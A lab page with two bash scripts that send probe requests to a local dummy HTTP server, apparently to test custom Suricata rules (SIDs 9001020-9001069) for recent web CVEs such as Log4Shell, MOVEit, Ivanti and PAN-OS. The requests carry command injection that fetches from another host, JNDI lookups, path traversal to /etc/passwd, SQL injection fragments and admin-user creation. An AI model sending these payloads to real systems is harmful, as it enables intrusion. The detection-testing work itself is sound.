编写2022+ web攻击的suricata规则-测试(9001020-9001069)

1.主机A开启服务

python3 -m http.server 80 --bind 10.66.66.1

2.主机B发送测试请求(9001020-9001039)

#!/usr/bin/env bash
# Treat a reference to an unset variable as an error. -e is deliberately
# not used: a refused or failed probe must not stop the rest of the batch.
set -u
# Target of every probe: the dummy listener started on host A.
HOST='10.66.66.1'
PORT='80'
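#######################################
# Run one probe and print the SID it is meant to trigger as a marker.
# Globals:
#   HIT_DELAY (optional) - seconds to pause after each probe so the sensor
#                          sees the requests as separate flows; default 1
# Arguments:
#   $1 - Suricata SID under test (only echoed, not interpreted)
#   $2 - command line to run. It is handed to eval, so it must be one of
#        the literal strings written in this script and never assembled
#        from external input.
# Outputs:
#   "[*] SID" on stdout. The probe's own stdout/stderr is discarded.
# Returns:
#   0 always. A non-2xx reply or a refused connection is expected from the
#   dummy listener; what matters is that the bytes were put on the wire.
#######################################
hit() {
  local sid="${1:?SID required}"
  local cmd="${2:?command string required}"
  printf '[*] %s\n' "$sid"
  # Best effort on purpose: the listener is python3 -m http.server, which
  # will reject most of these requests, and that is fine for a sensor test.
  eval "$cmd" >/dev/null 2>&1 || true
  sleep "${HIT_DELAY:-1}"
}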
# All curl probes go to the same dummy listener: build the URL prefix and
# the shared curl options once. --path-as-is is added only where the URL
# carries encoded or dot-dot segments that curl would otherwise normalise.
base="http://${HOST}:${PORT}"
c='curl -sS --max-time 3'
fwd='Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1;proto=http'

# Confluence OGNL-style token (9001020) and dangerous Java class name (9001021)
hit 9001020 "$c --path-as-is '${base}/%24%7B7*7%7D'"
hit 9001021 "$c --path-as-is '${base}/test?x=java.lang.Runtime'"

# Fortinet: loopback Forwarded header combined with the two User-Agents
# the rules key on (9001022 Node.js, 9001023 Report Runner)
hit 9001022 "$c -A 'Node.js' -H '${fwd}' '${base}/api/v2/cmdb/system/admin'"
hit 9001023 "$c -A 'Report Runner' -H '${fwd}' '${base}/api/v2/cmdb/system/admin'"

# PaperCut setup page, direct (9001024) and via service= (9001025)
hit 9001024 "$c '${base}/SetupCompleted'"
hit 9001025 "$c '${base}/?service=page/SetupCompleted'"

# Cisco IOS XE: double-encoded WSMA paths (9001026/9001027) and a
# privilege-15 user creation body (9001028)
hit 9001026 "$c --path-as-is '${base}/%2577ebui_wsma_HTTP'"
hit 9001027 "$c --path-as-is '${base}/%2577ebui_wsma_HTTPS'"
hit 9001028 "$c -X POST --data '<cisco:wsma-exec>username lab privilege 15</cisco:wsma-exec>' '${base}/webui'"

# Ivanti: dot-dot traversal (9001029) and shell-metacharacter body (9001030)
hit 9001029 "$c --path-as-is '${base}/api/v1/totp/user-backup-code/../../etc/passwd'"
hit 9001030 "$c --path-as-is -X POST --data 'x=1||/bin/sh' '${base}/api/v1/totp/user-backup-code'"

# MOVEit: the two ASPX endpoints (9001031/9001032) and an encoded SQLi
# fragment in the ISAPI query string (9001033)
hit 9001031 "$c '${base}/human2.aspx'"
hit 9001032 "$c '${base}/machine2.aspx'"
hit 9001033 "$c --path-as-is '${base}/moveitisapi/moveitisapi.dll?x=%27%20or%201=1'"

# ScreenConnect: setup wizard (9001034) and App_Extensions traversal (9001035)
hit 9001034 "$c '${base}/SetupWizard.aspx'"
hit 9001035 "$c --path-as-is '${base}/App_Extensions/../../web.config'"

# PAN-OS hipreport.esp: metacharacters in the body (9001036) and encoded
# metacharacters in the SESSID parameter (9001037)
hit 9001036 "$c -X POST --data 'x=1&&curl%20http://10.66.66.2/a' '${base}/ssl-vpn/hipreport.esp'"
hit 9001037 "$c --path-as-is '${base}/ssl-vpn/hipreport.esp?SESSID=a%26%26id'"
# 9001038 CitrixBleed hunting idp openid-configuration + large request
# The next two probes are hand-built by a python3 heredoc and piped through
# nc instead of going out via curl.
# NOTE(review): presumably so the 1500-byte X-Fill header and the exact
# request line reach the wire verbatim - confirm against the rule's
# size condition.
# Quoting: the single-quoted command string is closed and reopened around
# "$HOST $PORT" and $HOST so those are filled in when hit() runs, while the
# rest of the heredoc reaches python3 untouched.
# nc is run without -w; it returns here because the http.server listener on
# host A closes the connection after answering. Against a server that keeps
# the connection open this line would block, and the trailing || true does
# not help with that.
hit 9001038 'python3 - <<PY | nc -nv '"$HOST $PORT"' >/dev/null 2>&1 || true
pad = "A" * 1500
req = f"GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\r\nHost: '"$HOST"'\r\nX-Fill: {pad}\r\nConnection: close\r\n\r\n"
print(req, end="")
PY'
# 9001039 CitrixBleed hunting rp openid-configuration + large request
# Same construction as 9001038, differing only in the /oauth/rp/ path.
hit 9001039 'python3 - <<PY | nc -nv '"$HOST $PORT"' >/dev/null 2>&1 || true
pad = "A" * 1500
req = f"GET /oauth/rp/.well-known/openid-configuration HTTP/1.1\r\nHost: '"$HOST"'\r\nX-Fill: {pad}\r\nConnection: close\r\n\r\n"
print(req, end="")
PY'
# End-of-batch marker, so the sensor's alert log can be lined up with this run.
echo "[*] done"

3.主机B发送测试请求(9001040-9001069)

#!/usr/bin/env bash
# Treat a reference to an unset variable as an error. -e is deliberately
# not used: a refused or failed probe must not stop the rest of the batch.
set -u
# Target of every probe: the dummy listener started on host A.
HOST='10.66.66.1'
PORT='80'
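#######################################
# Send one raw HTTP request to $HOST:$PORT and print the SID it targets.
# Globals:
#   HOST, PORT  - target listener (required)
#   SEND_DELAY  - optional pause in seconds after each request, default 1,
#                 so the sensor sees the requests as separate flows
# Arguments:
#   $1 - Suricata SID under test (only echoed, not interpreted)
#   $2 - the complete request, headers and body with CRLFs included; it is
#        sent byte-for-byte, nothing is added or normalised
# Outputs:
#   "[*] send SID <sid>" on stdout; a one-line connection error on stderr
# Returns:
#   0 always - an unreachable target is reported, not fatal for the batch
#######################################
send_req() {
  local sid="${1:?SID required}"
  local req="${2:?request required}"
  printf '[*] send SID %s\n' "$sid"
  # The request travels as an argv element, so the quoted heredoc stays a
  # fixed program and no shell expansion ever touches the payload.
  python3 - "${HOST:?HOST not set}" "${PORT:?PORT not set}" "$req" <<'PY' || true
import socket, sys
host, port, req = sys.argv[1], int(sys.argv[2]), sys.argv[3]
try:
    # create_connection() resolves the address (IPv4 or IPv6) and the
    # 'with' block closes the socket on every path, error paths included.
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(req.encode())
        try:
            s.recv(1024)  # best effort: the reply is irrelevant to the test
        except OSError:
            pass
except OSError as e:
    # Report instead of dumping a traceback; the rest of the batch continues.
    print(f"[!] {host}:{port}: {e}", file=sys.stderr)
PY
  sleep "${SEND_DELAY:-1}"
}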
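# Request builders on top of send_req(), so each SID line below carries only
# what is specific to that rule. Content-Length is derived from the body
# instead of being typed by hand: the hand-written values for 9001056,
# 9001065 and 9001069 did not match their bodies, which leaves the HTTP
# parser waiting for bytes that never come.
#
#   http_get  SID PATH [HEADER-LINE ...]  - GET; extra headers go between
#                                           Host and Connection
#   http_post SID PATH BODY               - POST with a correct Content-Length
http_get() {
  local sid="${1:?SID required}"
  local path="${2:?path required}"
  shift 2
  local extra='' hdr
  for hdr in "$@"; do
    extra+="${hdr}"$'\r\n'
  done
  send_req "$sid" "GET ${path} HTTP/1.1"$'\r\n'"Host: ${HOST}"$'\r\n'"${extra}"$'Connection: close\r\n\r\n'
}

http_post() {
  local sid="${1:?SID required}"
  local path="${2:?path required}"
  local body="${3:?body required}"
  # ${#body} counts characters; the bodies below are ASCII, so that is the
  # byte count. Use a byte-accurate measure if a non-ASCII body is added.
  send_req "$sid" "POST ${path} HTTP/1.1"$'\r\n'"Host: ${HOST}"$'\r\n'"Content-Length: ${#body}"$'\r\nConnection: close\r\n\r\n'"${body}"
}

# Log4Shell-style JNDI lookups, including the nested-lookup obfuscation.
# Paths are single-quoted so ${...} reaches the wire literally.
http_get 9001040 '/?x=${jndi:ldap://10.66.66.2/a}'
http_get 9001041 '/?x=${jndi:rmi://10.66.66.2/a}'
http_get 9001042 '/?x=${jndi:dns://10.66.66.2/a}'
http_get 9001043 '/?x=${${lower:j}ndi:ldap://10.66.66.2/a}'
# Exchange autodiscover / powershell probes and the two token headers
http_get 9001044 '/autodiscover/autodiscover.json?x=a@b/powershell'
http_get 9001045 '/autodiscover/autodiscover.json' 'X-Rps-CAT: testcat'
http_get 9001046 '/powershell/' 'X-CommonAccessToken: testtoken'
# Confluence OGNL token and dangerous Java class names
http_get 9001047 '/%24%7B7*7%7D'
http_get 9001048 '/?x=java.lang.Runtime'
http_get 9001049 '/?x=ScriptEngineManager'
# Fortinet: loopback Forwarded header and the two User-Agents
http_get 9001050 '/api/v2/cmdb/system/admin' 'Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1;proto=http'
http_get 9001051 '/api/v2/cmdb/system/admin' 'User-Agent: Node.js'
http_get 9001052 '/api/v2/cmdb/system/admin' 'User-Agent: Report Runner'
# Ivanti: plain and encoded traversal, then metacharacters in the body
http_get 9001053 '/api/v1/totp/user-backup-code/../../etc/passwd'
http_get 9001054 '/api/v1/totp/user-backup-code/%2e%2e/%2e%2e/etc/passwd'
http_post 9001055 '/api/v1/totp/user-backup-code' $'a=1||id\n'
http_post 9001056 '/api/v1/totp/user-backup-code' $'a=/bin/sh\n'
# MOVEit endpoints and SQL fragments in the query string
http_get 9001057 '/human2.aspx'
http_get 9001058 '/machine2.aspx'
http_get 9001059 '/moveitisapi/moveitisapi.dll?x=union select'
http_get 9001060 '/guestaccess.aspx?x=waitfor delay'
# ScreenConnect setup wizard and App_Extensions traversal (plain, encoded)
http_get 9001061 '/SetupWizard.aspx'
http_get 9001062 '/App_Extensions/../../web.config'
http_get 9001063 '/App_Extensions/%2e%2e/%2e%2e/web.config'
# PAN-OS hipreport.esp: body metacharacters and a traversal in SESSID
http_post 9001064 '/ssl-vpn/hipreport.esp' $'a=1&&id\n'
http_post 9001065 '/ssl-vpn/hipreport.esp' $'a=/bin/sh\n'
http_get 9001066 '/ssl-vpn/hipreport.esp' 'Cookie: SESSID=/../tmp/x'
# Cisco IOS XE: double-encoded WSMA paths and privilege-15 user creation
http_get 9001067 '/%2577ebui_wsma_HTTP'
http_get 9001068 '/%2577ebui_wsma_HTTPS'
http_post 9001069 '/webui' $'<cisco:wsma-exec>username lab privilege 15</cisco:wsma-exec>\n'
# End-of-batch marker, so the sensor's alert log can be lined up with this run.
printf '%s\n' '[*] done'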

 
